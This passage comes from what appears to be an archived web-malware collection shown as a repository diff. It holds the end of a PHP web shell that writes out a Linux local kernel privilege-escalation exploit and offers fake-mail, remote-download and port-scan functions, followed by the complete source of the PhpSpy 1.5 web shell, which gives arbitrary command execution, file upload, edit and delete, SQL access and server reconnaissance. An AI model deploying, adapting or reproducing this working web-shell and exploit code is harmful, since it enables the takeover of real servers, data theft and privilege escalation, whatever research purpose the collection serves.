" execve(_PATH_BSHELL, argv, environ);\n" .
" fatal(\"Unable to spawn shell\\n\");\n" .
"}\n" .
"void remap(void)\n" .
"{\n" .
" static char stack[8 MB]; /* new stack */\n" .
" static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
" static unsigned * m;\n" .
" static unsigned b;\n" .
" m = (unsigned *) sbrk(map_size);\n" .
" if (!m)\n" .
" fatal(\"Unable to allocate memory\");\n" .
" environ = envp;\n" .
" asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
" b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
" if (munmap((void*)b, task_size - b) == -1)\n" .
" fatal(\"Unable to unmap stack\");\n" .
" while (b < task_size) {\n" .
" if (sbrk(PAGE_SIZE) == NULL)\n" .
" fatal(\"Unable to expand BSS\");\n" .
" b += PAGE_SIZE;\n" .
" }\n" .
" ldt(m);\n" .
" expand();\n" .
" knockout();\n" .
" shell();\n" .
"}\n" .
"int main(void)\n" .
"{\n" .
" configure();\n" .
" remap();\n" .
" return EXIT_FAILURE;\n" .
"}\n";
$fp = fopen("/tmp/xpl_brk.c", "w");
$ok = fwrite($fp, $kernel);
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
} else {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
}
}
?>
</CENTER>
<pre><font face="Tahoma" size="2">
<?php
// Function to Visualize Source Code files
if ($see != "") {
$fp = fopen($see, "r");
$read = fread($fp, 30000);
echo "============== $see ================<br>";
echo "<textarea name=textarea cols=80 rows=15>";
echo "$read";
Echo "</textarea>";
}
// Function to Dowload Local Xploite Binary COde or Source Code
if ($dx != "") {
$fp = @fopen("$hostxpl",r);
$fp2 = @fopen("$storage","w");
fwrite($fp2, "");
$fp1 = @fopen("$storage","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
}
}
flush( );
// Function to visulize Format Color Source Code PHP
if ($sfc != "") {
$showcode = show_source("$sfc");
echo "<font size=4> $showcode </font>";
}
// Function to Visualize all infomation files
if ($fileinfo != "") {
$infofile = stat("$fileanalize");
while (list($info, $value) = each ($infofile)) {
echo" Info: $info Value: $value <br>";
}
}
// Function to send fake mail
if ($fake == 1) {
echo "<FORM METHOD=POST ACTION=\"$SCRIPT_NAME?$QUERY_STRING&send=1\">";
echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\"><br>";
echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\"><br>";
echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\"><br>";
echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\"><br>";
echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\">";
echo "</FORM>";
}
if($send == 1) {
if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
} else {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
}
}
if ($portscan != "") {
$port = array ("21","22","23","25","110",);
$values = count($port);
for ($cont=0; $cont < $values; $cont++) {
@$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
$service = Getservbyport($port[$cont],"tcp");
@$get = fgets($sock[$cont]);
echo "<br>Port: $port[$cont] - Service: $service<br><br>";
echo "<br>Banner: $get <br><br>";
flush();
}
}
?>
</font></pre>

1010
web-malware-collection-13-06-2012/PHP/PHP Shell.txt Normal file
View file

File diff suppressed because it is too large Load diff

1583
web-malware-collection-13-06-2012/PHP/PHPJackal.txt Normal file
View file

File diff suppressed because it is too large Load diff

1074
web-malware-collection-13-06-2012/PHP/PHPRemoteView.txt Normal file
View file

File diff suppressed because it is too large Load diff

810
web-malware-collection-13-06-2012/PHP/PHPSPY.php Normal file
View file

@ -0,0 +1,810 @@
<?php
/*
+--------------------------------------------------------------------------+
| PhpSpy Version:1.5 |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: 4ngel@21cn.com |
| Date: July 22st(My mother's birthday), 2004 |
+--------------------------------------------------------------------------+
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check']="1";
// 验证方式,1为采用 Session 验证,其他数字则采用 Cookie验证
// 默认采用 Session 验证,如果不能正常登陆,建议改为 Cookie验证
$admin['checkmode']="1";
// 如果需要密码验证,请修改登陆密码
$admin['pass']="hkuser";
/*===================== 配置结束 =====================*/
// 允许程序在 register_globals = off 的环境下工作
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
/*===================== 身份验证 =====================*/
if($admin['check']=="1") {
if($admin['checkmode']=="1") {
/*------- session 验证 -------*/
session_start();
if ($_GET['action'] == "logout") {
session_destroy();
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>";
exit;
}
if ($_POST['action'] == "login") {
$adminpass=trim($_POST['adminpass']);
if ($adminpass==$admin['pass']) {
$_SESSION['adminpass'] = $admin['pass'];
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>";
exit;
}
}
if (session_is_registered('adminpass')) {
if ($_SESSION['adminpass']!=$admin['pass']) {
loginpage();
}
} else {
loginpage();
}
} else {
/*------- cookie 验证 -------*/
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>";
exit;
}
if ($_POST['action'] == "login") {
$adminpass=trim($_POST['adminpass']);
if ($adminpass==$admin['pass']) {
setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass']!=$admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
}//end check
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
// 下载文件
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('你要下的文件不存在!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP3 Generated Data');
@readfile($downfile);
exit;
}
}
// 程序目录(文件系统)
$pathname=str_replace('\\','/',dirname(__FILE__));
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
if (dir_writeable($nowpath)) {
$dir_writeable = "可写";
} else {
$dir_writeable = "不可写";
}
$dis_func = get_cfg_var("disable_functions");
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PHPINFO</a>" : "";
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell模式</a>" : "";
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PhpSpy Ver 1.5</title>
<style type="text/css">
.maintable {
background-color: "#FFFFFF";
border: "1px solid #115173";
}
body,td {
font-family: "sans-serif";
font-size: "12px";
line-height: "150%";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
a:link,
a:visited,
a:active{
color: "#000000";
text-decoration: underline;
}
a:hover{
color: "#465584";
text-decoration: none;
}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<p><strong><a href="?action=logout">注销会话</a> | <a href="?action=dir">返回根目录</a> | <a href="?action=phpenv">PHP环境变量</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL查询</a> | <a href="http://www.4ngel.net" target="_blank" title="下载此程序">Version 1.5</a></strong></p>
<?php
if ($_GET['action'] == "phpinfo") {
$dis_func = get_cfg_var("disable_functions");
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看&lt;PHP环境变量&gt;";
exit;
}
?>
<table width="760" border="0" cellpadding="0">
<form action="" method="GET">
<tr>
<td><p>程序路径:<?=$pathname?><br>当前目录(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
<br>跳转目录:
<input name="dir" type="text" class="INPUT">
<input type="submit" class="INPUT" value="确定"> 〖支持绝对路径和相对路径〗
</p></td>
</tr>
</form>
<form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
<tr>
<td colspan="2">上传文件到当前目录:
<input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="uploadfile"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
</tr>
</form>
<form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
<tr>
<td colspan="2">新建文件在当前目录:
<input name="newfile" type="text" class="INPUT" value="">
<input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="createfile"></td>
</tr>
</form>
<form action="" method="POST">
<tr>
<td colspan="2">新建目录在当前目录:
<input name="newdirectory" type="text" class="INPUT" value="">
<input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="createdirectory"></td>
</tr>
</form>
</table>
<hr width="760" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if(@$delfile!="") {
if(file_exists($delfile)) {
@unlink($delfile);
echo "".$delfile." 删除成功!";
} else {
echo "文件已不存在,删除失败!";
}
}
// 删除目录
elseif($_POST['action'] == "rmdir") {
if($deldir!="") {
$deldirs="$dir/$deldir";
if(!file_exists("$deldirs")) {
echo "目录已不存在!";
} else {
deltree($deldirs);
}
} else {
echo "删除失败!";
}
}
// 创建目录
elseif($_POST['action'] == "createdirectory") {
if(!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if(file_exists("$mkdirs")) {
echo "该目录已存在!";
} else {
echo $msg=@mkdir("$mkdirs",0777) ? "创建目录成功!" : "创建失败!";
@chmod("$mkdirs",0777);
}
}
}
// 上传文件
elseif($_POST['action'] == "uploadfile") {
echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "上传成功!" : "上传失败!";
}
// 编辑文件
elseif($_POST['action'] == "doeditfile") {
$filename="$dir/$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";
@fclose($fp);
}
// 编辑文件属性
elseif($_POST['action'] == "editfileperm") {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo $msg=@chmod($dir."/".$file,$fileperm) ? "属性修改成功!" : "修改失败!";
echo " [".$file."] 修改后的属性为:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";
}
// 连接MYSQL
elseif($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "数据库连接成功!";
} else {
echo mysql_error();
}
}
// 执行SQL语句
elseif($doquery) {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$result = @mysql_query($_POST['sql_query']);
if ($result) {
echo "SQL语句成功执行";
}else{
echo "出错: ".mysql_error();
}
mysql_close();
}
// 查看PHP配置参数状况
elseif($_POST['action'] == "viewphpvar") {
echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}
else {
echo "本程序由 Security Angel 安全组织 angel[BST] 独立开发,可在 <a href=\"http://www.4ngel.net\" target=\"_blank\">http://www.4ngel.net</a> 下载最新版本.";
}
echo "</b></p>\n";
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr bgcolor="#cccccc">
<td align="center" nowrap width="40%"><b>文件</b></td>
<td align="center" nowrap width="20%"><b>修改日期</b></td>
<td align="center" nowrap width="12%"><b>大小</b></td>
<td align="center" nowrap width="8%"><b>属性</b></td>
<td align="center" nowrap width="20%"><b>操作</b></td>
</tr>
<?php
// 目录列表
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
if($a=="1"){
if($file!=".."&&$file!=".") {
$lastsave=@date("Y-n-d H:i:s",filemtime("$dir/$file"));
$dirperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">&lt;dir&gt;</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">删除</a></td>\n";
echo "</tr>\n";
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\">返回上级目录</a></td>\n";
echo "</tr>\n";
}
}
$dir_i++;
}
}//while
@closedir($dirs);
// 文件列表
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
if($a=="0"){
$size=@filesize("$dir/$file");
$size=$size/1024 ;
$size= @number_format($size, 3);
$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));
@$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\"><a href=\"$dir/$file\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">$size KB</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">删除</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}
@closedir($dirs);
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"5\" align=\"right\">".$dir_i." 个目录<br>".$file_i." 个文件</td>\n";
echo "</tr>\n";
?>
</table>
<?php
}// end dir
elseif ($_GET['action'] == "editfile") {
if($newfile=="") {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">新建/编辑文件 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
</tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center">当前文件:<input class="input" type="text" name="editfilename" size="30"
value="<?=$editfile?>"> 输入新文件名则建立新文件</td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" value="确定写入" class="input">
<input name="action" type="hidden" value="doeditfile">
<input type="reset" value="重置" class="input"></td>
</tr>
</form>
</table>
<?php
}//end editfile
elseif ($_GET['action'] == "shell") {
if (!get_cfg_var("safe_mode")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">WebShell Mode</td>
</tr>
<form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center">提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.</td>
</tr>
<tr class="firstalt">
<td align="center">
选择执行函数:
<select name="execfunc" class="input">
<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
</select> 
输入命令:
<input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
<input type="submit" value="execute" class="input"></td>
</tr>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} else {
system($_POST['command']);
}
}
?></textarea></td>
</tr>
</form>
</table>
<?php
} else {
?>
<p><b>Safe_Mode 已打开, 无法执行系统命令.</b></p>
<?php
}
}//end shell
elseif ($_GET['action'] == "deldir") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="firstalt">
<td align="center">删除 <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> 目录</td>
</tr>
<tr class="secondalt">
<td align="center">注意:如果该目录非空,此次操作将会删除该目录下的所有文件.您确定吗?</td>
</tr>
<tr class="firstalt">
<td align="center">
<input name="action" type="hidden" value="rmdir">
<input type="submit" value="delete" class="input">
</td>
</tr>
</form>
</table>
<?php
}//end deldir
elseif ($_GET['action'] == "fileperm") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">修改文件属性 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
</tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> 的属性为:
<input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input">
<input name="dir" type="hidden" value="<?=urlencode($dir)?>">
<input name="action" type="hidden" value="editfileperm">
<input type="submit" value="modify" class="input"></td>
</tr>
</form>
</table>
<?php
}//end fileperm
elseif ($_GET['action'] == "sql") {
$servername = isset($servername) ? $servername : '127.0.0.1';
$dbusername = isset($dbusername) ? $dbusername : 'root';
$dbpassword = isset($dbpassword) ? $dbpassword : '';
$dbname = isset($dbname) ? $dbname : '';
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">执行 SQL 语句</td>
</tr>
<form action="?action=sql" method="POST">
<tr class="secondalt">
<td align="center">Host:
<input name="servername" type="text" class="INPUT" value="<?=$servername?>">
User:
<input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
Pass:
<input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
DB:
<input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
<input name="connect" type="submit" class="INPUT" value="连接"></td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" name="doquery" value="执行" class="input"></td>
</tr>
</form>
</table>
<?php
}//end sql query
elseif ($_GET['action'] == "phpenv") {
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
$adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
$dis_func = get_cfg_var("disable_functions");
if ($dis_func == "") {
$dis_func = "No";
}else {
$dis_func = str_replace(" ","<br>",$dis_func);
$dis_func = str_replace(",","<br>",$dis_func);
}
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info[0] = array("服务器时间",date("Y年m月d日 h:i:s",time()));
$info[1] = array("服务器域名","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>");
$info[2] = array("服务器IP地址",gethostbyname($_SERVER["SERVER_NAME"]));
$info[3] = array("服务器操作系统",PHP_OS);
$info[5] = array("服务器操作系统文字编码",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
$info[6] = array("服务器解译引擎",$_SERVER["SERVER_SOFTWARE"]);
$info[7] = array("Web服务端口",$_SERVER["SERVER_PORT"]);
$info[8] = array("PHP运行方式",strtoupper(php_sapi_name()));
$info[9] = array("PHP版本",PHP_VERSION);
$info[10] = array("运行于安全模式",getphpcfg("safemode"));
$info[11] = array("服务器管理员",$adminmail);
$info[12] = array("本文件路径",__FILE__);
$info[13] = array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen"));
$info[14] = array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl"));
$info[15] = array("显示错误信息 display_errors",getphpcfg("display_errors"));
$info[16] = array("自动定义全局变量 register_globals",getphpcfg("register_globals"));
$info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc"));
$info[18] = array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit"));
$info[19] = array("POST最大字节数 post_max_size",getphpcfg("post_max_size"));
$info[20] = array("允许最大上传文件 upload_max_filesize",$upsize);
$info[21] = array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."");
$info[22] = array("被禁用的函数 disable_functions",$dis_func);
$info[23] = array("phpinfo()",$phpinfo);
$info[24] = array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');
$info[25] = array("图形处理 GD Library",getfun("imageline"));
$info[26] = array("IMAP电子邮件系统",getfun("imap_close"));
$info[27] = array("MySQL数据库",getfun("mysql_close"));
$info[28] = array("SyBase数据库",getfun("sybase_close"));
$info[29] = array("Oracle数据库",getfun("ora_close"));
$info[30] = array("Oracle 8 数据库",getfun("OCILogOff"));
$info[31] = array("PREL相容语法 PCRE",getfun("preg_match"));
$info[32] = array("PDF文档支持",getfun("pdf_close"));
$info[33] = array("Postgre SQL数据库",getfun("pg_close"));
$info[34] = array("SNMP网络管理协议",getfun("snmpget"));
$info[35] = array("压缩文件支持(Zlib)",getfun("gzclose"));
$info[36] = array("XML解析",getfun("xml_set_object"));
$info[37] = array("FTP",getfun("ftp_login"));
$info[38] = array("ODBC数据库连接",getfun("odbc_close"));
$info[39] = array("Session支持",getfun("session_start"));
$info[40] = array("Socket支持",getfun("fsockopen"));
?>
<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?action=phpenv" method="POST">
<tr class="firstalt">
<td style="padding-left: 5px;"><b>查看PHP配置参数状况</b></td>
</tr>
<tr class="secondalt">
<td style="padding-left: 5px;">请输入配置参数(:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" value="查看" class="input"><input name="action" type="hidden" value="viewphpvar"></td>
</tr>
</form>
<?php
for($a=0;$a<3;$a++){
if($a == 0){
$hp = array("server","服务器特性");
}elseif($a == 1){
$hp = array("php","PHP基本特性");
}elseif($a == 2){
$hp = array("basic","组件支持状况");
}
?>
<tr class="firstalt">
<td style="padding-left: 5px;"><b><?=$hp[1]?></b></td>
</tr>
<tr class="secondalt">
<td>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<?
if($a == 0){
for($i=0;$i<=12;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}elseif($a == 1){
for($i=13;$i<=24;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}elseif($a == 2){
for($i=25;$i<=40;$i++){
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}
?>
</table>
</td>
</tr>
<?
}//for
echo "</table>";
}//end phpenv
?>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
<tr>
<td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
<td align="right"><?php
debuginfo();
ob_end_flush();
?></td>
</tr>
</table>
</center>
</body>
</html>
<?php
/*======================================================
函数库
======================================================*/
// 登陆入口
function loginpage() {
?>
<style type="text/css">
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20"><input type="hidden" name="action" value="login">
<input type="submit" value="OK">
</form>
<?php
exit;
}//end loginpage()
// 页面调试信息
function debuginfo() {
global $starttime;
$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo "Processed in $totaltime second(s)";
}
// 去掉转义字符
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// 删除目录
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "<b>目录删除成功!</b>" : "<font color=\"#ff0000\">目录删除失败!</font>";
}
// 判断读写情况
function dir_writeable($dir) {
if (!is_dir($dir)) {
@mkdir($dir, 0777);
}
if(is_dir($dir)) {
if ($fp = @fopen("$dir/test.txt", 'w')) {
@fclose($fp);
@unlink("$dir/test.txt");
$writeable = 1;
} else {
$writeable = 0;
}
}
return $writeable;
}
// 表格行间的背景色替换
function getrowbg() {
global $bgcounter;
if ($bgcounter++%2==0) {
return "firstalt";
} else {
return "secondalt";
}
}
// 获取当前的文件系统路径
function getPath($mainpath, $relativepath) {
global $dir;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
